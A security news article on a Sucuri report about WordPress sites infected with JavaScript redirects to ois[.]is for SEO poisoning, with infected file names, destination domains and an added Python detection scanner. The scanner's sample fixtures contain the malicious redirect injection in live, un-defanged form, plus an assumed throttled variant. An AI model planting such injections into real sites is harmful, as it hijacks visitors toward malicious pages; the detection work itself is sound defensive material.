date 2022-11-10

Sucuri has published a report on an ongoing campaign that compromises websites and turns them into SEO poisoning tools to promote malicious Q&A sites. The redirections go through the ois[.]is domain and use an unusual redirect target: .png image files.

Currently, almost 16,000 websites are infected, most of them WordPress-based, and the number is growing fast.

Sucuri, a website security company, has published a report on ongoing attacks against websites, most of them running WordPress. According to the report, malicious actors are hacking websites to redirect their visitors to fake Q&A sites via ois[.]is.

The number of infected websites is growing

Sucuri states that nearly 15,000 websites have been affected in this campaign; when we checked PublicWWW results while writing this article, the count had almost reached 16,000. Sucuri's own SiteCheck scanner also detected more than 2,500 websites redirecting to ois[.]is in September and October.

The purpose of this campaign appears to be boosting the search ranking of the destination websites: the flood of redirects is meant to confuse search engines into treating those sites as credible and placing them higher in search results. They are likely to be used in future campaigns to spread malware or steal credentials through phishing.

100 files per website

The ois[.]is redirects are achieved by infecting approximately 100 files on each target website; the most commonly infected ones, all of them WordPress core files, are listed below:

./wp-signup.php

./wp-cron.php

./wp-links-opml.php

./wp-settings.php

./wp-comments-post.php

./wp-mail.php

./xmlrpc.php

./wp-activate.php

./wp-trackback.php

./wp-blog-header.php

« If the malware does not detect a logged in user or login attempt it then injects the malicious JavaScript code. There are two common variations of redirect scripts currently in circulation. »

The basic redirect code looks like the one below, combining a window.location.href assignment with a meta refresh tag:

<script>window.location.href='hxxps://ois[.]is/images/logo.png';</script><meta http-equiv='refresh' content='0;URL=hxxps://ois[.]is/images/logo.png'>

The sophisticated version stores a marker in the visitor's browser localStorage so that the same visitor is redirected at most once every 2 or 6 hours, which makes the infection harder to notice and reproduce.

All of these redirects point to .png files, named logo.png in the basic variant and logo-X.png (X between 1 and 8) in the sophisticated variant. The attackers also use a bit.ly address to hide their links.
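As an added example (not code from Sucuri or from the report), here is a Python scanner that walks a WordPress install and flags both redirect variants described above, using only the indicators the article gives: the ois[.]is domain, the logo.png / logo-1..8.png targets, window.location.href and meta-refresh redirects, and localStorage use in the throttled variant. The sample files it creates are constructed for the demonstration; the article does not show the throttled variant's code, so its shape below is an assumption. The core-file list is the one given above.

```python
"""Scan a WordPress tree for the ois[.]is redirect injection.

Added example, not code from Sucuri or the report. Indicators come from the
article; the regexes, the verdict logic and the sample files are my own.
"""
import os
import re
import sys
import tempfile

# Indicators of compromise drawn from the report (regexes are assumptions).
INDICATORS = {
    "ois_domain": re.compile(r"(?<![\w.-])ois\.is(?![\w-])", re.I),
    "png_target": re.compile(r"/images/logo(?:-[1-8])?\.png", re.I),
    "js_redirect": re.compile(r"window\.location\.href\s*=", re.I),
    "meta_refresh": re.compile(r"<meta\s+http-equiv=['\"]refresh['\"]", re.I),
    "local_storage": re.compile(r"localStorage\.(?:getItem|setItem)", re.I),
}

# Core files the report lists as the most commonly infected.
CORE_FILES = {
    "wp-signup.php", "wp-cron.php", "wp-links-opml.php", "wp-settings.php",
    "wp-comments-post.php", "wp-mail.php", "xmlrpc.php", "wp-activate.php",
    "wp-trackback.php", "wp-blog-header.php",
}


def scan_text(text):
    """Return the names of all indicators present in one file's contents."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def classify(hits):
    """Map indicator hits to a verdict; None means 'not this campaign'.

    A redirect mechanism alone is not enough: legitimate code also assigns
    window.location.href, so the ois[.]is domain or the logo*.png target
    must be present as well.
    """
    if not hits & {"ois_domain", "png_target"}:
        return None
    if "local_storage" in hits:
        return "throttled"   # the 2/6-hour localStorage variant
    if hits & {"js_redirect", "meta_refresh"}:
        return "basic"       # window.location.href + meta refresh variant
    return "suspicious"      # target present but no redirect mechanism seen


def scan_tree(root):
    """Walk a WordPress install and return {relative path: verdict}."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                verdict = classify(scan_text(fh.read()))
            if verdict:
                findings[os.path.relpath(path, root)] = verdict
    return findings


# Constructed sample site: a clean core file, a legitimate redirect in a theme,
# the basic variant (the snippet quoted in the article, de-fanging removed) and
# a throttled variant whose shape is assumed, not copied from the report.
BASIC_INJECTION = (
    "<script>window.location.href='https://ois.is/images/logo.png';</script>"
    "<meta http-equiv='refresh' content='0;URL=https://ois.is/images/logo.png'>"
)
THROTTLED_INJECTION = (
    "<script>var t=localStorage.getItem('_r');"
    "if(!t||Date.now()-t>7200000){localStorage.setItem('_r',Date.now());"
    "window.location.href='https://ois.is/images/logo-3.png';}</script>"
)
SAMPLE_FILES = {
    "wp-settings.php": "<?php\nrequire_once ABSPATH . WPINC . '/load.php';\n",
    "wp-content/themes/demo/footer.php":
        "<script>window.location.href='/thank-you/';</script>\n",
    "wp-cron.php": "<?php\n// ... original code ...\n?>\n" + BASIC_INJECTION + "\n",
    "xmlrpc.php": "<?php\n// ... original code ...\n?>\n" + THROTTLED_INJECTION + "\n",
}


def build_sample_site():
    """Write the constructed sample files into a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def report(findings):
    """Format findings, tagging files from the report's core-file list."""
    lines = []
    for rel in sorted(findings):
        tag = "core" if rel in CORE_FILES else "other"
        lines.append(f"{findings[rel]:10} {tag:5} {rel}")
    return lines


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_site()
    for line in report(scan_tree(target)):
        print(line)
```

Run it with the path to a WordPress document root to scan a real site; with no argument it scans the constructed sample. A hit in one of the core files is a strong signal, since those files should be byte-identical to the clean WordPress release and can be restored from it.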

Redirect destinations

While using .png URLs as the redirect target is an unusual choice, the visitor does not end up looking at an image: the malware ultimately uses window.location.href to send the visitor to a Google search result URL for a website that is being prepared for a future campaign. Sucuri has identified the following destinations:

en.w4ksa[.]com

peace.yomeat[.]com

qa.bb7r[.]com

en.ajeel[.]store

qa.istisharaat[.]com

en.photolovegirl[.]com

en.poxnel[.]com

qa.tadalafilhot[.]com

questions.rawafedpor[.]com

qa.elbwaba[.]com

questions.firstgooal[.]com

qa.cr-halal[.]com

qa.aly2um[.]com

Since no single vulnerability has been identified as the initial infection vector, Sucuri advises website admins to change all administrator and access-point passwords and to update all their software.